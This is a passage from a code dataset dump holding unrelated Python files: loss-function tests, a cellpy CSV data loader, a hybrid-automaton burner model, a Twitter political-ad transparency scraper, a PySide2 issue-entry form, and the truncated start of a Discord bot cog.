def test_unknown_cases(self):\n \"\"\"\n Test dissimilarity function raises an error\n if an unknonw loss type is passed.\n \"\"\"\n config = {\"name\": \"random\"}\n with pytest.raises(ValueError) as err_info:\n label.get_dissimilarity_fn(config)\n assert \"Unknown loss type\" in str(err_info.value)\n\n @pytest.mark.parametrize(\n \"config\",\n [\n {\n \"name\": \"multi_scale\",\n \"multi_scale\": {\"loss_type\": \"jaccard\", \"loss_scales\": [0, 1, 2, 4]},\n },\n {\"name\": \"single_scale\", \"single_scale\": {\"loss_type\": \"jaccard\"}},\n ],\n )\n def test_known_cases(self, config):\n \"\"\"\n Asserting loss function returned by get dissimilarity\n function when appropriate strings passed.\n \"\"\"\n loss_fn = label.get_dissimilarity_fn(config)\n loss = loss_fn(y_true=self.y_true, y_pred=self.y_pred)\n assert loss.shape == (self.batch_size,)\n","sub_path":"test/unit/test_loss_label.py","file_name":"test_loss_label.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594921712","text":"import logging\nimport os\n\nimport pandas as pd\n\nfrom cellpy.parameters.internal_settings import get_headers_normal, ATTRS_CELLPYFILE\n\nfrom cellpy.readers.instruments.mixin import Loader\nfrom cellpy.readers.core import FileID, Cell, check64bit, humanize_bytes\nfrom cellpy.parameters import prms\n\nDEFAULT_CONFIG = {\n \"structure\": {\n \"format\": \"csv\",\n \"table_name\": None,\n \"header_definitions\": \"labels\",\n \"comment_chars\": (\"#\", \"!\"),\n \"sep\": \";\",\n \"locate_start_data_by\": \"line_number\",\n \"locate_end_data_by\": \"EOF\",\n \"locate_vars_by\": \"key_value_pairs\",\n \"start_data\": 19,\n \"header_info_line\": 1,\n \"start_data_offset\": 0,\n \"header_info_parse\": \"in_key\",\n \"header_info_splitter\": \";\",\n \"file_type_id_line\": 0,\n \"file_type_id_match\": None,\n },\n \"variables\": {\n \"mass\": \"mass\",\n \"total_mass\": \"total_mass\",\n \"schedule_file\": \"schedule_file\",\n \"schedule\": \"schedule\",\n \"creator\": \"operator\",\n \"loaded_from\": \"loaded_from\",\n \"channel_index\": \"channel_index\",\n \"channel_number\": \"channel_number\",\n \"item_ID\": \"instrument\",\n \"test_ID\": \"test_name\",\n \"cell_name\": \"cell\",\n \"material\": \"material\",\n \"counter_electrode\": \"counter\",\n \"reference_electrode\": \"reference\",\n \"start_datetime\": \"date\",\n \"fid_last_modification_time\": \"last_modified\",\n \"fid_size\": \"size\",\n \"fid_last_accessed\": \"last_accessed\",\n },\n \"headers\": {\n \"data_point_txt\": \"index\",\n \"charge_capacity_txt\": \"charge_capacity\",\n \"current_txt\": \"current\",\n \"cycle_index_txt\": \"cycle\",\n \"datetime_txt\": \"date_stamp\",\n \"discharge_capacity_txt\": \"discharge_Capacity\",\n \"step_index_txt\": \"step\",\n \"step_time_txt\": \"step_time\",\n \"test_time_txt\": \"test_time\",\n \"voltage_txt\": \"voltage\",\n },\n \"units\": {\"current\": 0.001, \"charge\": 0.001, \"mass\": 0.001, \"specific\": 1.0},\n \"limits\": {\n \"current_hard\": 0.0000000000001,\n \"current_soft\": 0.00001,\n \"stable_current_hard\": 2.0,\n \"stable_current_soft\": 4.0,\n \"stable_voltage_hard\": 2.0,\n \"stable_voltage_soft\": 4.0,\n \"stable_charge_hard\": 0.9,\n \"stable_charge_soft\": 5.0,\n \"ir_change\": 0.00001,\n },\n}\n\n\nclass CustomLoader(Loader):\n \"\"\" Class for loading cell data from custom formatted files.\n\n The file that contains the description of the custom data file\n should be given by issuing the\n pick_definition_file or given in the config file\n (prms.Instruments.custom_instrument_definitions_file)\n\n The format of the custom data file should be on the form\n\n ...\n # comment\n # ...\n variable sep value\n variable sep value\n ...\n header1 sep header2 sep ...\n value1 sep value2 sep ...\n ...\n\n where sep is either defined in the description file or the\n config file.\n\n The definition file should use the YAML format and it\n must contain\n\n xxx\n xxx\n\n\n \"\"\"\n\n def __init__(self):\n \"\"\"initiates the class\"\"\"\n\n self.logger = logging.getLogger(__name__)\n self.headers_normal = get_headers_normal()\n self.definition_file = self.pick_definition_file()\n self.units = None\n self.limits = None\n self.headers = None\n self.variables = None\n self.structure = None\n self.parse_definition_file()\n\n @staticmethod\n def pick_definition_file():\n return prms.Instruments.custom_instrument_definitions_file\n\n # TODO: @jepe - create yaml file example (from DEFAULT_CONFIG)\n # TODO: @jepe - create yaml file parser\n def parse_definition_file(self):\n if self.definition_file is None:\n logging.info(\"no definition file for custom format\")\n logging.info(\"using default settings\")\n settings = DEFAULT_CONFIG\n else:\n raise NotImplementedError\n\n self.units = settings[\"units\"]\n self.limits = settings[\"limits\"]\n self.headers = settings[\"headers\"]\n self.variables = settings[\"variables\"]\n self.structure = settings[\"structure\"]\n\n def get_raw_units(self):\n return self.units\n\n def get_raw_limits(self):\n return self.limits\n\n def _find_data_start(self, file_name, sep):\n if self.structure[\"locate_start_data_by\"] != \"line_number\":\n raise NotImplementedError\n if not self.structure[\"start_data\"] is None:\n return self.structure[\"start_data\"] + self.structure[\"start_data_offset\"]\n\n else:\n logging.debug(\"searching for line where data starts\")\n header_info_line = self.structure[\"header_info_line\"]\n header_info_parse = self.structure[\"header_info_parse\"]\n header_info_splitter = self.structure[\"header_info_splitter\"]\n header_info_line = self.structure[\"header_info_line\"]\n\n with open(file_name, \"rb\") as fp:\n for i, line_ in enumerate(fp):\n if i == header_info_line:\n line = line_.strip()\n line = line.decode()\n break\n\n if header_info_parse == \"in_key\":\n _, v = line.split(header_info_splitter)\n else:\n _, v = line.split(sep)\n v = int(v)\n return v\n\n def loader(self, file_name, **kwargs):\n new_tests = []\n if not os.path.isfile(file_name):\n self.logger.info(\"Missing file_\\n %s\" % file_name)\n return\n\n # find out strategy (based on structure)\n if self.structure[\"format\"] != \"csv\":\n raise NotImplementedError\n\n sep = self.structure.get(\"sep\", prms.Reader.sep)\n if sep is None:\n sep = prms.Reader.sep\n\n locate_vars_by = self.structure.get(\"locate_vars_by\", \"key_value_pairs\")\n comment_chars = self.structure.get(\"comment_chars\", [\"#\", \"!\"])\n header_row = self.structure.get(\"start_data\", None)\n if header_row is None:\n header_row = self._find_data_start(file_name, sep)\n\n # parse variables\n var_lines = []\n with open(file_name, \"rb\") as fp:\n for i, line in enumerate(fp):\n if i < header_row:\n line = line.strip()\n try:\n line = line.decode()\n except UnicodeDecodeError:\n logging.debug(\n \"UnicodeDecodeError: \" \"skipping this line: \" f\"{line}\"\n )\n else:\n if line.startswith(comment_chars):\n logging.debug(f\"Comment: {line}\")\n else:\n var_lines.append(line)\n else:\n break\n\n var_dict = dict()\n if locate_vars_by == \"key_value_pairs\":\n for line in var_lines:\n parts = line.split(sep)\n try:\n var_dict[parts[0]] = parts[1]\n except IndexError as e:\n logging.debug(f\"{e}\\ncould not split var-value\\n{line}\")\n\n else:\n raise NotImplementedError\n\n data = Cell()\n data.loaded_from = file_name\n fid = self._generate_fid(file_name, var_dict)\n\n # parsing cellpydata attributes\n for attribute in ATTRS_CELLPYFILE:\n key = self.variables.get(attribute, None)\n # print(f\"{attribute} -> {key}\")\n if key:\n val = var_dict.pop(key, None)\n if key in [\"mass\"]:\n val = float(val)\n # print(f\"{attribute}: {val}\")\n setattr(data, attribute, val)\n\n data.raw_data_files.append(fid)\n\n # setting optional attributes (will be implemented later I hope)\n key = self.variables.get(\"total_mass\", None)\n if key:\n total_mass = var_dict.pop(key, None)\n logging.debug(\"total_mass is given, but not propagated\")\n\n logging.debug(f\"unused vars: {var_dict}\")\n\n raw = self._parse_csv_data(file_name, sep, header_row)\n raw = self._rename_cols(raw)\n raw = self._check_cycleno_stepno(raw)\n data.raw_data_files_length.append(raw.shape[0])\n data.summary = None\n data.raw = raw\n new_tests.append(data)\n return new_tests\n\n def _parse_csv_data(self, file_name, sep, header_row):\n raw = pd.read_csv(file_name, sep=sep, header=header_row, skip_blank_lines=False)\n return raw\n\n def _rename_cols(self, raw):\n rename_col_dict = dict()\n\n for col_def in self.headers:\n new_name = self.headers_normal[col_def]\n old_name = self.headers[col_def]\n if old_name in raw.columns:\n rename_col_dict[old_name] = new_name\n\n raw = raw.rename(columns=rename_col_dict)\n return raw\n\n # TODO: @jepe - finalize the _check sub-modules\n\n def _check_cycleno_stepno(self, raw):\n return raw\n\n def _convert_to_cellpy_units(self, data):\n return data\n\n def _check_columns(self, data):\n return data\n\n def _check_dtypes(self, data):\n return data\n\n def _generate_fid(self, file_name, var_dict):\n fid = FileID()\n last_modified = var_dict.get(self.variables[\"fid_last_modification_time\"], None)\n size = var_dict.get(self.variables[\"fid_size\"], None)\n last_accessed = var_dict.get(self.variables[\"fid_last_accessed\"], None)\n\n if any([last_modified, size, last_accessed]):\n fid.name = os.path.abspath(file_name)\n fid.full_name = file_name\n fid.location = os.path.dirname(file_name)\n\n fid.size = size\n fid.last_modified = last_modified\n fid.last_accessed = last_accessed\n fid.last_info_changed = last_accessed\n else:\n fid.populate(file_name)\n\n return fid\n\n def inspect(self, data):\n data = self._convert_to_cellpy_units(data)\n data = self._check_columns(data)\n data = self._check_dtypes(data)\n return data\n\n def load(self, file_name):\n \"\"\"Load a raw data-file\n\n Args:\n file_name (path)\n\n Returns:\n loaded test\n \"\"\"\n\n new_rundata = self.loader(file_name)\n new_rundata = self.inspect(new_rundata)\n return new_rundata\n\n\nif __name__ == \"__main__\":\n import pathlib\n from pprint import pprint\n\n print(\"running this\")\n loader = CustomLoader()\n # loader.pick_definition_file()\n datadir = \"/Users/jepe/scripting/cellpy/test_data\"\n datadir = pathlib.Path(datadir)\n my_file_name = datadir / \"custom_data_001.csv\"\n # print(help(loader.get_raw_units))\n # print(help(loader.get_raw_limits))\n # print(f\"Trying to load {my_file_name}\")\n loader.load(my_file_name)\n","sub_path":"cellpy/readers/instruments/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":11073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162609018","text":"import macropy.activate\nfrom language import *\nfrom gen import *\nfrom sympy import *\nimport shac\n\nsignal_u=Symbol('signal_u')\n\n# Burner for the watertank\n\node0 = Ode(sympify(\"diff(y(t))\"), sympify(\"y(t)\"), 0, {})\node1 = Ode(sympify(\"diff(y(t))-1\"), sympify(\"y(t)\"), 0, {})\n\n\n# The locations of the hybrid automaton\nb1 = Loc(\"b1\", [ode0], [],\n {S(\"y(t)\"): [Guard(S(\"y>=0\")), Guard(S(\"y <= 0\"))]})\nb2 = Loc(\"b2\", [ode1], [],\n {S(\"y(t)\"): [Guard(S(\"y < 0.1\"))]})\nb3 = Loc(\"b3\", [ode0], [],\n {S(\"y(t)\"): [Guard(S(\"y>=0\")), Guard(S(\"y <= 0\"))]})\nb4 = Loc(\"b4\", [ode1], [],\n {S(\"y(t)\"): [Guard(S(\"y < 0.1\"))]})\n\n# The edges\ne1 = Edge('b1', 'b2', {S(\"y(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update1(Symbol('y'), Symbol('y'))],\n [Event(\"TURN_ON\")])\n\ne2 = Edge('b2', 'b3', {S(\"y(t)\"): [Guard(S(\"y>= 0.1\"))]},\n [Update.Update1(Symbol('y'), Symbol('0')),\n Update.Update1(Symbol('signal'), Symbol('1'))],\n [])\n\ne3 = Edge('b3', 'b4', {S(\"y(t)\"): [Guard(sympify(\"True\"))]},\n [Update.Update1(Symbol('y'), Symbol('y'))],\n [Event(\"TURN_OFF\")])\n\ne4 = Edge('b4', 'b1', {S(\"y(t)\"): [Guard(S(\"y>= 0.1\"))]},\n [Update.Update1(Symbol('y'), Symbol('0')),\n Update.Update1(Symbol('signal'), Symbol('0'))],\n [])\n\n\nburner = Ha(\"burner\", [b1, b2, b3, b4], b1,\n [e1, e2, e3, e4], [], [signal_u])\n\n# Compile\n# shac.compile(burner)\n","sub_path":"examples/TSE2015/Piha/watertank&burner/burner.py","file_name":"burner.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168499303","text":"import configparser\nimport csv\nimport datetime\nimport json\nimport os\nimport random\nimport shutil\nimport smtplib\nimport sys\nimport time\nfrom email.mime.text import MIMEText\nfrom pprint import pprint\n\nimport lxml\nimport requests\nfrom bs4 import BeautifulSoup\n#import oauth2 as oauth\nfrom requests_oauthlib import OAuth1Session\nfrom twitter import *\n\nif len(sys.argv) < 2:\n exit(\"Usage:python3 FBAdScrapeScript.py crawl_config.cfg [Optional: TwitterHandles.csv]\")\n\nTwitterHandlesFile = ''\n\nif len(sys.argv) == 2:\n CrawlFile = sys.argv[1]\n TwitterHandlesFile = 'congress.csv' #Default if a new handles file is not provided. \n TwitterHandles = False\n\nif len(sys.argv) == 3:\n TwitterHandlesFile = sys.argv[2] # A new twitter handles file is provided. \n TwitterHandles = True\n\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.argv[1])\n\nUSERNAME = config['ACCOUNT']['USERNAME']\nPASSWORD = config['ACCOUNT']['PASS']\nSCRAPEREMAIL = config['ACCOUNT']['EMAIL']\nCONSUMER_KEY = config['OAUTH']['CONSUMERKEY']\nCONSUMER_SECRET = config['OAUTH']['CONSUMERSECRET']\nACCESS_KEY_TOKEN = config['OAUTH']['TOKENKEY']\nACCESS_KEY_SECRET = config['OAUTH']['TOKENSECRET']\nMASTERSEEDLIST = config['SEEDLIST']['MASTERSEEDFILE']\nPAGESPERUSER = int(config['SPECS']['PAGES'])\nMINWAIT = int(config['SPECS']['MINWAITUSER'])\nMAXWAIT = int(config['SPECS']['MAXWAITUSER'])\nERROREMAIL = config['ACCOUNT']['ERROREMAIL']\nJSON_INDENT = int(config['SPECS']['JSON_INDENT'])\n\n\nTwitterAPI = Twitter(auth=OAuth(ACCESS_KEY_TOKEN, ACCESS_KEY_SECRET, \n CONSUMER_KEY, CONSUMER_SECRET))\n\n\nLoginPost = \"https://twitter.com/sessions\"\nURL = \"https://twitter.com\"\nPolUserLink = \"https://ads.twitter.com/transparency/political_advertisers.json?\"\nTweetsLinkForUser = \"https://ads.twitter.com/transparency/tweets_timeline.json?user_id=%s&cursor=%s\"\nSearchUserLink = 'https://api.twitter.com/1.1/users/search.json?q=%s&count=20&filter:verified'\n\ndata = {\"session[username_or_email]\": USERNAME,\n \"session[password]\": PASSWORD,\n \"scribe_log\": \"\",\n \"redirect_after_login\": \"/\",\n \"remember_me\": \"1\"}\n\nnow = datetime.datetime.now()\nnow_str = \"\".join(str(e) for e in [now.year, now.month, now.day, now.hour])\nWriteDir = 'NEWcrawl_'+ now_str # Adding NEW so DB parser doesn't try to parse this until it's complete.\n\nHeaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n\n\n\n\n\ndef GetUsersWithPoliticalAds(Keyword, Session, TwitterHandles):\n print(\"Getting tweets for keyword \", Keyword)\n UsersFromKeyword = []\n PayloadToWrite = {}\n\n if TwitterHandles: # If the twitter handles file, then just make a simple query to get user metadata\n UsersFromKeyword = TwitterAPI.users.search(q=Keyword, include_ext_highlighted_label=True)\n else:\n for i in range(1, PAGESPERUSER+1): # If just keyword search, then make a deep search for all results. \n TwitterResponse = TwitterAPI.users.search(q=Keyword, count=20, include_ext_highlighted_label=True, page=i)\n UsersFromKeyword.extend(TwitterResponse)\n #print(UsersFromKeyword)\n time.sleep(random.randint(MINWAIT, MAXWAIT))\n count=0\n for User in UsersFromKeyword:\n UserID = User['id_str']\n if User['verified'] or TwitterHandles: #If curated list of twitter handles, don't check for verified stamp\n ScreenName = User['screen_name']\n Tweets = GetTweetsForUser(UserID, ScreenName)\n if Tweets:\n count+=1\n if count>1:\n SendErrorEmail(\"The annoying user search with mutliple hits \" + Keyword)\n PayloadToWrite[User['id_str']] = {}\n PayloadToWrite[User['id_str']]['ScreenName'] = ScreenName\n PayloadToWrite[User['id_str']]['Tweets'] = Tweets\n\n WriteToDisk(ScreenName, PayloadToWrite, \"Tweets\")\n time.sleep(random.randint(MINWAIT,MAXWAIT))\n\n\n\n\n\ndef GetTweetsForUser(UserID, ScreenName):\n \"\"\"\n Gets all the political ads for every user. \n Works around infinite scrolling through setting the 'cursor' \n parameter. \n \"\"\"\n MoreTweets = True\n Count = 0\n ErrorCount = 0\n AllTweets = []\n\n while MoreTweets:\n try:\n Tweets = Session.get(TweetsLinkForUser % (UserID, Count), headers=Headers)\n if Tweets.status_code == 200:\n Tweets = json.loads(Tweets.text)[\"tweets\"]\n if len(Tweets):\n AllTweets.extend(Tweets)\n Count += 1\n else:\n MoreTweets = False\n else:\n SendErrorEmail(\"Not 200 code on \" + TweetsLinkForUser % (UserID, Count))\n ErrorCount += 1\n if ErrorCount == 10:\n MoreTweets = False\n SendErrorEmail(\"Exiting scraping tweets for \"+ TweetsLinkForUser % (UserID, Count))\n except Exception as e:\n SendErrorEmail(\"Error with \" + TweetsLinkForUser % (UserID, Count) + \" Error: \" + str(e))\n time.sleep(random.randint(MINWAIT,MAXWAIT))\n return AllTweets\n\n\n\n\n\ndef WriteToDisk(ScreenName, PayloadToWrite, Type):\n\n if not os.path.exists(WriteDir):\n os.makedirs(WriteDir)\n\n if not os.path.exists(os.path.join(WriteDir, ScreenName)):\n os.makedirs(os.path.join(WriteDir, ScreenName))\n\n UserFolder = os.path.join(WriteDir, ScreenName)\n \n File = os.path.join(UserFolder, Type) + '.json'\n\n with open(File, 'w') as f:\n json.dump(PayloadToWrite, f, indent=JSON_INDENT)\n\n return\n\n\n\n\n\ndef extractSeedWordsCSV(FirstName = True, LastName = True):\n \"\"\"\n Names of Political Candidates in the CSV format. \n The default parameters allow us to choose whether we want to get first names \n or last names.\n \"\"\"\n if TwitterHandlesFile.lower().startswith(\"twitter\"):\n with open(TwitterHandlesFile) as f:\n CurrentSeeds = set([seedWord[2].strip()[len('@'):].lower() for seedWord in csv.reader(f) if seedWord[2].strip()[len('@'):] != \"\"])\n else:\n with open(TwitterHandlesFile, 'r') as f:\n CurrentSeeds = set([' '.join(seedWord).strip() for seedWord in csv.reader(f) if seedWord != \" \"])\n CurrentSeeds.update(set([seedWord[1] for seedWord in csv.reader(f) if seedWord != \" \"]))\n\n with open(MASTERSEEDLIST, 'w+') as f:\n SeedsMaster = set([Seed.strip() for Seed in f.readlines()])\n for Seed in CurrentSeeds:\n if Seed not in SeedsMaster:\n f.write(Seed + '\\n')\n\n return CurrentSeeds\n\n\n\n\n\ndef AddPolUsersLink(TotalSeeds, Session):\n AllPolUsersFromLink = Session.get(PolUserLink, headers=Headers)\n if AllPolUsersFromLink.status_code == 200:\n AllUsers = json.loads(AllPolUsersFromLink.text)['users']\n for User in AllUsers:\n TotalSeeds.add(User['screenName'].lower())\n else:\n SendErrorEmail(\"Not 200 code on \" + PolUserLink)\n\n return TotalSeeds\n\n\n\n\n\ndef SendErrorEmail(ErrorMessage):\n msg = MIMEText(str(ErrorMessage))\n msg['from'] = SCRAPEREMAIL\n msg['to'] = ERROREMAIL\n msg['subject'] = 'Error in getting tweets script'\n s = smtplib.SMTP('smtp.live.com', 25)\n s.ehlo()\n s.starttls()\n s.login(SCRAPEREMAIL, PASSWORD)\n s.sendmail(SCRAPEREMAIL, [ERROREMAIL], msg.as_string())\n s.quit()\n\n\n\n\n\nif __name__ == \"__main__\":\n Start = time.time()\n Count = 0\n UsersWithPol = []\n with requests.Session() as Session:\n\n Resp = Session.get(URL, headers=Headers)\n # get auth token\n soup = BeautifulSoup(Resp.content, \"lxml\")\n AUTH_TOKEN = soup.select_one(\"input[name=authenticity_token]\")[\"value\"]\n # update data, post and you are logged in.\n data[\"authenticity_token\"] = AUTH_TOKEN\n Resp = Session.post(LoginPost, data=data, headers=Headers)\n print(\"Handles file\", TwitterHandlesFile)\n TotalSeeds = extractSeedWordsCSV()\n print(len(TotalSeeds))\n TotalSeeds = AddPolUsersLink(TotalSeeds, Session)\n print(len(TotalSeeds))\n #for Keyword in open(\"Keywords.txt\"):\n for Keyword in TotalSeeds:\n Count += 1\n print(\"Seed # %s out of %s\", (Count, len(TotalSeeds)))\n print(\"Twitter Handles: \", TwitterHandles)\n GetUsersWithPoliticalAds(Keyword.strip(), Session, TwitterHandles)\n time.sleep(random.randint(MINWAIT//10,MAXWAIT//10))\n FinalNameDir = WriteDir[3:]\n shutil.move(WriteDir, FinalNameDir)\n config.set(\"WORKINGDIR\", \"CURRENT\", FinalNameDir)\n with open(sys.argv[1], 'wb') as configfile:\n config.write(configfile)\n print(\"Total time to get tweets from users: \", time.time()-Start)\n","sub_path":"GetTwitterUserPolAds.py","file_name":"GetTwitterUserPolAds.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236060939","text":"\nfrom PySide2.QtWidgets import QWidget, QScrollArea, QLabel, QDateTimeEdit, QComboBox, QTextEdit, \\\n QPushButton, QVBoxLayout, QHBoxLayout, QFormLayout, QFrame, QMessageBox\nfrom PySide2.QtGui import QIcon, QPixmap, Qt\nfrom PySide2.QtCore import QDateTime\n\n\nimport backend\n\ndb = backend.Database(\"sr-data.db\")\n\ndefaultImg = \"assets/icons/logo-dark.png\"\n\n\nclass AddIssue(QWidget):\n def __init__(self, parent):\n QWidget.__init__(self)\n self.setWindowTitle(\"Add issue\")\n self.setWindowIcon(QIcon(\"assets/icons/icon.ico\"))\n self.setGeometry(450, 150, 750, 950)\n # self.setFixedSize(self.size())\n\n self.Parent = parent\n\n self.UI()\n self.show()\n\n def UI(self):\n self.widgets()\n self.layouts()\n\n def widgets(self):\n self.scroll = QScrollArea()\n self.scroll.setWidgetResizable(True)\n\n # Top layout widgets\n self.addIssueImg = QLabel()\n self.img = QPixmap('assets/icons/create-issue.png')\n self.addIssueImg.setPixmap(self.img)\n self.addIssueImg.setAlignment(Qt.AlignCenter)\n self.titleText = QLabel(\"Add issue\")\n self.titleText.setAlignment(Qt.AlignCenter)\n # Middle layout widgets\n self.issueInfoTitleText = QLabel(\"Issue info\")\n self.issueInfoTitleText.setAlignment(Qt.AlignCenter)\n self.dateEntry = QDateTimeEdit()\n self.dateEntry.setDateTime(QDateTime.currentDateTime())\n self.priorityEntry = QComboBox()\n self.priorityEntry.setEditable(True)\n self.observerEntry = QComboBox()\n self.observerEntry.setEditable(True)\n self.revisionTeamEntry = QComboBox()\n self.revisionTeamEntry.setEditable(True)\n self.inspectionNameEntry = QComboBox()\n self.inspectionNameEntry.setEditable(True)\n self.observationThemeEntry = QComboBox()\n self.observationThemeEntry.setEditable(True)\n self.facilityEntry = QComboBox()\n self.facilityEntry.setEditable(True)\n self.facilitySupervisorEntry = QComboBox()\n self.facilitySupervisorEntry.setEditable(True)\n self.specificLocationEntry = QTextEdit()\n self.inspectedDepartmentEntry = QComboBox()\n self.inspectedDepartmentEntry.setEditable(True)\n self.inspectedContractorEntry = QComboBox()\n self.inspectedContractorEntry.setEditable(True)\n self.inspectedSubcontractorEntry = QComboBox()\n self.inspectedSubcontractorEntry.setEditable(True)\n self.deadlineEntry = QDateTimeEdit()\n self.deadlineEntry.setDateTime(QDateTime.currentDateTime())\n\n # Bottom layout widgets\n self.attachFilesBtn = QPushButton(\"Attach files\")\n self.addActionBtn = QPushButton(\"Add action\")\n\n self.rootCauseEntry = QComboBox()\n self.rootCauseEntry.setEditable(True)\n self.rootCauseDetailsEntry = QTextEdit()\n self.rootCauseActionPartyEntry = QComboBox()\n self.rootCauseActionPartyEntry.setEditable(True)\n self.addRootCauseBtn = QPushButton(\"Add root cause\")\n\n self.submitObservationBtn = QPushButton(\"Add issue\")\n self.submitObservationBtn.clicked.connect(self.addIssue)\n\n def layouts(self):\n self.mainLayout = QVBoxLayout()\n self.topLayout = QHBoxLayout()\n self.bottomLayout = QFormLayout()\n\n # Put elements into frames for visual distinction\n self.topFrame = QFrame()\n self.bottomFrame = QFrame()\n\n # Add widgets to top layout\n self.topLayout.addWidget(self.addIssueImg)\n self.topLayout.addWidget(self.titleText)\n\n self.topFrame.setLayout(self.topLayout)\n\n # Add widgets to middle layout\n self.bottomLayout.addRow(self.issueInfoTitleText)\n self.bottomLayout.addRow(QLabel(\"Inspection Date: \"), self.dateEntry)\n self.bottomLayout.addRow(QLabel(\"Priority: \"), self.priorityEntry)\n self.bottomLayout.addRow(QLabel(\"Observer: \"), self.observerEntry)\n self.bottomLayout.addRow(QLabel(\"Revision Team: \"), self.revisionTeamEntry)\n self.bottomLayout.addRow(QLabel(\"Inspection Name: \"), self.inspectionNameEntry)\n self.bottomLayout.addRow(QLabel(\"HSE Theme: \"), self.observationThemeEntry)\n self.bottomLayout.addRow(QLabel(\"Facility: \"), self.facilityEntry)\n self.bottomLayout.addRow(QLabel(\"Facility supervisor: \"), self.facilitySupervisorEntry)\n self.bottomLayout.addRow(QLabel(\"Specific location: \"), self.specificLocationEntry)\n self.bottomLayout.addRow(QLabel(\"Inspected department: \"), self.inspectedDepartmentEntry)\n self.bottomLayout.addRow(QLabel(\"Inspected contractor: \"), self.inspectedContractorEntry)\n self.bottomLayout.addRow(QLabel(\"Inspected subcontractor: \"), self.inspectedSubcontractorEntry)\n self.bottomLayout.addRow(QLabel(\"Deadline: \"), self.deadlineEntry)\n\n self.bottomLayout.addRow(QLabel(\"\"), self.attachFilesBtn)\n self.bottomLayout.addRow(QLabel(\"\"), self.addActionBtn)\n\n self.bottomLayout.addRow(QLabel(\"\"), self.addRootCauseBtn)\n self.bottomLayout.addRow(QLabel(\"\"), self.submitObservationBtn)\n\n self.bottomFrame.setLayout(self.bottomLayout)\n\n # Make bottom frame scollable\n self.scroll.setWidget(self.bottomFrame)\n\n # Add frames to main layout\n self.mainLayout.addWidget(self.topFrame)\n self.mainLayout.addWidget(self.scroll)\n\n self.setLayout(self.mainLayout)\n\n def addIssue(self):\n date = self.dateEntry.text()\n priority = self.priorityEntry.currentText()\n observer = self.observerEntry.currentText()\n revisionTeam = self.revisionTeamEntry.currentText()\n inspectionName = self.inspectionNameEntry.currentText()\n observationTheme = self.observationThemeEntry.currentText()\n facility = self.facilityEntry.currentText()\n facilitySupervisor = self.facilitySupervisorEntry.currentText()\n specificLocation = self.specificLocationEntry.toPlainText()\n inspectedDept = self.inspectedDepartmentEntry.currentText()\n inspectedContr = self.inspectedContractorEntry.currentText()\n inspectedSubcontr = self.inspectedSubcontractorEntry.currentText()\n deadline = self.deadlineEntry.text()\n\n if date and priority and observer and revisionTeam and inspectionName and observationTheme and facility\\\n and facilitySupervisor and specificLocation and inspectedDept and inspectedContr \\\n and inspectedSubcontr and deadline != \"\":\n try:\n query = \"INSERT INTO issues (issue_date, issue_priority, issue_observer, issue_team,\" \\\n \"issue_inspection, issue_theme, issue_facility, issue_fac_supervisor,\" \\\n \"issue_spec_loc, issue_insp_dept, issue_insp_contr, issue_insp_subcontr, issue_deadline, created_on) \" \\\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n\n # The purpose of this block is to make created_on timestamp the same format as other dates\n currentTime = QDateTimeEdit()\n currentTime.setDateTime(QDateTime.currentDateTime())\n now = currentTime.text()\n\n db.cur.execute(query, (date, priority, observer, revisionTeam, inspectionName, observationTheme,\n facility, facilitySupervisor, specificLocation, inspectedDept, inspectedContr,\n inspectedSubcontr, deadline, now))\n db.conn.commit()\n\n QMessageBox.information(self, \"Info\", \"Issue has been added\")\n\n self.Parent.displayIssues()\n self.close()\n except:\n QMessageBox.information(self, \"Info\", \"Issue has not been added\")\n else:\n QMessageBox.information(self, \"Info\", \"Fields cannot be empty\")\n\n\n","sub_path":"SR/add_issue.py","file_name":"add_issue.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"543159595","text":"import logging\nimport re\nfrom itertools import combinations\n\nfrom discord import Embed\nfrom discord.ext import commands\n\nfrom amiya.utils import arknights, constants, discord_common\n\n\nclass GeneralCogError(commands.CommandError):\n pass\n\n\nclass General(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(brief=\"Shows infos of a stage\", usage=\"[stage]\")\n async def stage(self, ctx, *stage: str):\n \"\"\"\n Detailed information of a stage\n\n E.g: ;stage 4-7\n \"\"\"\n\n if stage is None:\n raise GeneralCogError(\"You need to provide a stage name or id!\")\n\n # Get stage info\n info, extra_info, anni_info = arknights.get_stage(stage)\n\n title = f'[{info[\"code\"]}] {info[\"name\"]} {\"(Challenge Mode)\" if \"+cm\" in stage else \"\"}'\n\n # Check if stage is boss stage\n if info[\"bossMark\"] is True:\n title += \" (Boss Stage)\"\n\n # Regex for stuffs like <@lv.item>\n pattern = re.compile(r\"<@.+?>(]*>?)\", re.DOTALL)\n description = pattern.sub(r\"**\\1**\", info[\"description\"])\n\n embed = Embed(\n title=title,\n description=f'Recommend Operator Lv. **[{info[\"dangerLevel\"]}]**\\n{description}',\n )\n\n # General info\n general = \"\"\n if anni_info is None:\n general += f'• Sanity Cost : {info[\"apCost\"]}\\n• Practice Ticket Cost : {max(0, info[\"practiceTicketCost\"])}\\n• EXP Gain : {info[\"expGain\"]}\\n• LMD Gain : {info[\"goldGain\"]}\\n• Favor Gain : {info[\"completeFavor\"]}'\n if len(info[\"unlockCondition\"]) > 0:\n unlock_condition = [\n f'{\"Clear\" if st[\"completeState\"] == 2 else \"Perfect\"} **{arknights.get_stage(st[\"stageId\"])[0][\"code\"]}**' for st in info[\"unlockCondition\"]]\n general += f'\\n• Unlock Conditions : {\", \".join(unlock_condition)}'\n if info[\"slProgress\"] > 0:\n general += f'\\n• Storyline Progress : 